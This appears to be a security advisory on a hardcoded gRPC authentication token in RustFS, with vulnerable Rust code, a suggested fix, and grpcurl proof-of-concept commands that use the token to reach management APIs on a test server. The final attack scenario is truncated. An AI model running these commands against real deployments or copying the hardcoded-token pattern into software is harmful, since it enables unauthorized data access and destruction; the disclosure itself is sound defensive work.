Sensitive information in source code in rustfs

Description

RustFS has a gRPC Hardcoded Token Authentication Bypass

## Vulnerability Overview

### Description

RustFS implements gRPC authentication using a hardcoded static token "rustfs rpc" that is:

1. Publicly exposed in the source code repository
2. Hardcoded on both client and server sides
3. Non-configurable with no mechanism for token rotation
4. Universally valid across all RustFS deployments

Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes.

### CVSS 3.1 Score

Score: 9.8 (Critical)

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

- Attack Vector (AV): Network - Exploitable remotely
- Attack Complexity (AC): Low - No special conditions required
- Privileges Required (PR): None - No authentication needed (bypassed)
- User Interaction (UI): None - Fully automated exploitation
- Scope (S): Unchanged - Impact contained to vulnerable component
- Confidentiality (C): High - Complete data disclosure
- Integrity (I): High - Complete data modification capability
- Availability (A): High - Complete service disruption capability

---

## Vulnerable Code Analysis

### Server-Side Authentication (rustfs/src/server/http.rs:679-686)

```rust
#[allow(clippy::result_large_err)]
fn check_auth(req: Request<()>) -> std::result::Result<Request<()>, Status> {
    let token: MetadataValue<_> = "rustfs rpc".parse().unwrap(); // ⚠️ HARDCODED!

    match req.metadata().get("authorization") {
        Some(t) if token == t => Ok(req),
        _ => Err(Status::unauthenticated("No valid auth token")),
    }
}
```

Issues:
- Static token hardcoded as string literal
- No configuration mechanism (environment variable, file, etc.)
- Token visible in public GitHub repository
- Identical across all installations

### Client-Side Authentication (crates/protos/src/lib.rs:153-174)

```rust
pub async fn node_service_time_out_client(
    addr: &String,
) -> Result<NodeServiceClient<...>, Box<dyn Error>> {
    let token: MetadataValue<_> = "rustfs rpc".parse()?; // ⚠️ SAME HARDCODED TOKEN!
    // ...
    Ok(NodeServiceClient::with_interceptor(
        channel,
        Box::new(move |mut req: Request<()>| {
            req.metadata_mut().insert("authorization", token.clone());
            Ok(req)
        }),
    ))
}
```

Issues:
- Client uses identical hardcoded token
- No secure token distribution mechanism
- Token cannot be rotated without code changes

### Service Integration (rustfs/src/server/http.rs:520-521)

```rust
let rpc_service = NodeServiceServer::with_interceptor(make_server(), check_auth);
let service = hybrid(s3_service, rpc_service);
```

The `check_auth` interceptor is applied to all gRPC services via `NodeServiceServer::with_interceptor`, protecting all 50+ gRPC methods in node.proto with the same weak authentication.
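A fail-closed, rotation-aware replacement for the literal comparison in `check_auth`, added here as an illustration and not taken from the RustFS project: the accepted token set is loaded from the environment rather than compiled in, an unconfigured or too-short token rejects every request instead of falling back to a default, a previous token stays valid during a rolling rotation, and the comparison runs in constant time. The names `AuthConfig`, `check_token`, `load_from_env` and the `RUSTFS_RPC_TOKEN` / `RUSTFS_RPC_TOKEN_PREVIOUS` variables are assumptions, not project settings; in the real server the `Err` would be mapped to `Status::unauthenticated` inside the tonic interceptor, as the original does.

```rust
// Added example, not RustFS project code: a fail-closed, rotation-aware replacement for
// the literal comparison in `check_auth`. `AuthConfig`, `check_token`, `load_from_env` and the
// RUSTFS_RPC_TOKEN* names are assumptions; a tonic interceptor would map `Err(_)` to `Status::unauthenticated`.
use std::env;

#[derive(Debug, PartialEq)]
pub enum AuthError {
    NotConfigured, // no token configured: reject everything, never fall back to a built-in default
    TooShort,      // configured token is shorter than MIN_TOKEN_LEN
    Missing,       // request carried no `authorization` metadata
    Invalid,       // token present but matches neither accepted value
}

/// Current token plus, optionally, the previous one, so clients and servers can be
/// rotated in a rolling restart without a window in which authentication fails.
pub struct AuthConfig {
    pub current: Vec<u8>,
    pub previous: Option<Vec<u8>>,
}

pub const MIN_TOKEN_LEN: usize = 32;

/// Constant-time comparison over the token bytes; only the length can leak.
fn ct_eq(a: &[u8], b: &[u8]) -> bool {
    if a.len() != b.len() {
        return false;
    }
    a.iter().zip(b).fold(0u8, |acc, (x, y)| acc | (x ^ y)) == 0
}

/// Validate a presented token against the configured set.
pub fn check_token(cfg: Option<&AuthConfig>, presented: Option<&[u8]>) -> Result<(), AuthError> {
    let cfg = cfg.ok_or(AuthError::NotConfigured)?;
    if cfg.current.len() < MIN_TOKEN_LEN {
        return Err(AuthError::TooShort);
    }
    let presented = presented.ok_or(AuthError::Missing)?;
    let mut ok = ct_eq(presented, &cfg.current);
    if let Some(prev) = &cfg.previous {
        ok |= ct_eq(presented, prev); // always evaluated, so timing does not reveal which slot matched
    }
    if ok { Ok(()) } else { Err(AuthError::Invalid) }
}

/// Read the token set from the environment instead of a string literal in the binary.
pub fn load_from_env() -> Option<AuthConfig> {
    let current = env::var("RUSTFS_RPC_TOKEN").ok()?.into_bytes();
    let previous = env::var("RUSTFS_RPC_TOKEN_PREVIOUS").ok().map(String::into_bytes);
    Some(AuthConfig { current, previous })
}
```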
---

## Reproduction Steps

### Environment Setup

Test Environment:
- RustFS Server: localhost:9000 (HTTP + gRPC hybrid service)
- RustFS Console: localhost:9001
- Container: rustfs/rustfs:latest (Docker Compose deployment)
- Default credentials: rustfsadmin/rustfsadmin

Tools Required:
- grpcurl v1.9.3+ (gRPC command-line client)
- RustFS proto files: crates/protos/src/node.proto

### Step 1: Verify Authentication is Enforced

Test 1.1: Request without authentication token

```bash
$ grpcurl -plaintext \
  -import-path /private/tmp/rustfs/crates/protos/src \
  -proto node.proto \
  -d '{}' \
  localhost:9000 node_service.NodeService/Ping
```

Expected Result: ✅ Authentication failure

```
ERROR:
  Code: Unauthenticated
  Message: No valid auth token
```

Test 1.2: Request with incorrect token

```bash
$ grpcurl -plaintext \
  -H 'authorization: wrong-token-12345' \
  -import-path /private/tmp/rustfs/crates/protos/src \
  -proto node.proto \
  -d '{}' \
  localhost:9000 node_service.NodeService/Ping
```

Expected Result: ✅ Authentication failure

```
ERROR:
  Code: Unauthenticated
  Message: No valid auth token
```

Conclusion: Authentication is properly enforced - unauthorized requests are rejected.
---

### Step 2: Extract Hardcoded Token from Source Code

Public Source Code Analysis:

```bash
$ git clone https://github.com/rustfs/rustfs.git
$ cd rustfs
$ grep -rn '"rustfs rpc"' --include='*.rs'
```

Result: ✅ Token found in public source code

```
rustfs/src/server/http.rs:680:    let token: MetadataValue<_> = "rustfs rpc".parse().unwrap();
crates/protos/src/lib.rs:153:    let token: MetadataValue<_> = "rustfs rpc".parse()?;
```

Extracted Token: rustfs rpc

---

### Step 3: Exploit - Authenticate Using Hardcoded Token

Test 3.1: Successful authentication with hardcoded token

```bash
$ grpcurl -plaintext \
  -H 'authorization: rustfs rpc' \
  -import-path /private/tmp/rustfs/crates/protos/src \
  -proto node.proto \
  -d '{}' \
  localhost:9000 node_service.NodeService/Ping
```

Result: 🔓 AUTHENTICATION BYPASSED

```json
{
  "version": "1",
  "body": "DAAAAAAABgAIAAQABgAAAAQAAAANAAAAaGVsbG8sIGNhbGxlcgAAAA=="
}
```

Analysis: Server accepted the hardcoded token and returned a successful response. Authentication completely bypassed.

---

### Step 4: Demonstrate Access to Sensitive Management APIs

Test 4.1: Server Configuration Disclosure

```bash
$ grpcurl -plaintext \
  -H 'authorization: rustfs rpc' \
  -import-path /private/tmp/rustfs/crates/protos/src \
  -proto node.proto \
  -d '{}' \
  localhost:9000 node_service.NodeService/ServerInfo
```

Result: ✅ Complete server configuration disclosed

```json
{
  "success": true,
  "serverProperties": "n6ZvbmxpbmWsMC4wLjAuMDo5MDAwoM0DhdkjMjAyNS0xMi0xOVQwNjo1NzoxOVpAMS4wLjAtYWxwaGEuNzaggawwLjAuMC4wOjkwMDCmb25saW5llNwAGq0vZGF0YS9ydXN0ZnMwwq0vZGF0YS9ydXN0ZnMwwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAANwAGq0vZGF0YS9ydXN0ZnMxwq0vZGF0YS9ydXN0ZnMxwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAdwAGq0vZGF0YS9ydXN0ZnMywq0vZGF0YS9ydXN0ZnMywsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAtwAGq0vZGF0YS9ydXN0ZnMzwq0vZGF0YS9ydXN0ZnMzwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAwGRAZUAAAAAAAAAoIA="
}
```

Analysis:
- Server returned complete configuration including storage paths, endpoint addresses, version info
- Binary data contains sensitive internal state (MessagePack encoded)
- Information disclosure confirmed

Test 4.2: Disk Information Access

```bash
$ grpcurl -plaintext \
  -H 'authorization: rustfs rpc' \
  -import-path /private/tmp/rustfs/crates/protos/src \
  -proto node.proto \
  -d '{}' \
  localhost:9000 node_service.NodeService/DiskInfo
```

Result: ✅ Authenticated request accepted (business logic error returned, not auth error)

```json
{
  "error": {
    "code": 36,
    "errorInfo": "io error can not find disk"
  }
}
```

Analysis:
- Request passed authentication (error is business logic, not authentication)
- Proves attacker has authenticated access to sensitive system information APIs

---

## Impact Analysis

### Affected APIs

All 50+ gRPC methods in node_service.NodeService are vulnerable:

#### 🔴 CRITICAL Impact - Data Destruction
- DeleteBucket - Delete production buckets
- DeleteVolume - Destroy entire storage volumes
- DeleteUser - Remove legitimate users
- DeletePolicy - Remove access control policies
- DeleteServiceAccount - Remove service accounts

#### 🔴 CRITICAL Impact - Configuration Manipulation
- ReloadSiteReplicationConfig - Corrupt cluster replication
- SignalService - Control service lifecycle
- LoadPolicy - Modify access control policies
- LoadPolicyMapping - Alter policy assignments

#### 🟠 HIGH Impact - Unauthorized Data Access/Modification
- ReadAll / ReadAt - Read arbitrary data
- WriteAll / WriteStream - Inject malicious data
- RenameFile / RenameData - Manipulate file system
- UpdateMetadata / WriteMetadata - Corrupt metadata

#### 🟠 HIGH Impact - Privilege Escalation
- LoadUser - Access user credentials
- LoadServiceAccount - Access service credentials
- LoadGroup - Access group memberships

#### 🟡 MEDIUM Impact - Information Disclosure
- ServerInfo - Server configuration disclosure
- DiskInfo - Storage configuration disclosure
- GetMetrics - Performance metrics disclosure
- GetBucketStats - Bucket statistics disclosure
- LocalStorageInfo - Storage system information
- ListBucket - Bucket enumeration

#### 🟡 MEDIUM Impact - Cluster Operations
- MakeBucket - Unauthorized bucket creation
- HealBucket - Trigger repair operations
- BackgroundHealStatus - Monitor internal operations

### Attack Scenarios

#### Scenario 1: Data Destruction

```bash
# Enumerate all buckets
grpcurl -plaintext -H 'authorization: rustfs rpc'
```

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.
